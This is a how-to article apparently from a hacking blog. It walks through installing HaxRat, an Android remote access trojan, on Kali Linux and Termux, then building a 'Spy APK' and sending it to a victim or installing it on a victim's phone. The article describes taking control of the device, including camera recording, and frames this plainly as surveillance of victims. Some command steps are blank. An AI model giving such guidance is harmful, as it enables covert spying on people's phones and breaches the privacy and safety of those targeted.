HaxRat is a cloud based remote android management suite in simple word it is a Android RAT, powered by NodeJS. It works in Linux and Termux (Android).
Installing HaxRat on Kali Linux
The installation process is the same as we did in our L3MON tutorial. We have detailed discussion on our that post So we are not going to explain the commands.
First we install JRE in Kali by using following command:
sudo apt-get install openjdk-8-jre
Then we download NodeJs in our system by applying following command:
curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -
Now we install NodeJs by preceding following command:
sudo apt-get install -y nodejs
Now we need pm2 process manager to install this we use following command:
sudo npm install pm2 -g
Now we clone haxRat from it’s GitHub repository by using following command:
git clone https://github.com/Hax4us/haxRat
Then we navigate to server directory under haxRat by using cd command:
Then we need to install dependencies by using following command:
Then we start the server by using following command:
Now we can see our server in our browser http://localhost:22533 there will be a login page as following screenshot:
Now we stop this server by using CTRL+C command. Now what to do ? Login ? But where are the credentials? We have talked before how to create a custom credential on our older L3MON tutorial. Otherwise check the haxRat GitHub repository for default credentials.
After login we can see the main page as shown in the following screenshot:
Now we go to the APK Builder page and give our local IP address and click on build.
If got error like “Wrong java Version installed…..” this when building APK then try following command:
sudo update-alternatives --config java
Then Then we type 2 and enter.
Then we stop our running haxRat server by CTRL+C and start it again this problem will be solved.
Now we can build Spy APK and send it to victim, whenever victim install it and grant the permission. Or if we got victim’s phone in hand then we can implement this.
We got the victim in our haxRat dashboard like following screenshot:
Now in the manage section we can manage the Android device totally. Magics will start from here.
|Installed Android Apps|
|Recording from front Camera|
Installing HaxRat on Android (using Termux)
This is easy to installed in Termux. We try following commands one after another to install and configure haxRat.
apt install nodejs
git clone https://github.com/hax4us/haxRat.git
In our browser we navigate to http://<Local IP>:22533 and we will be the login screen of haxRat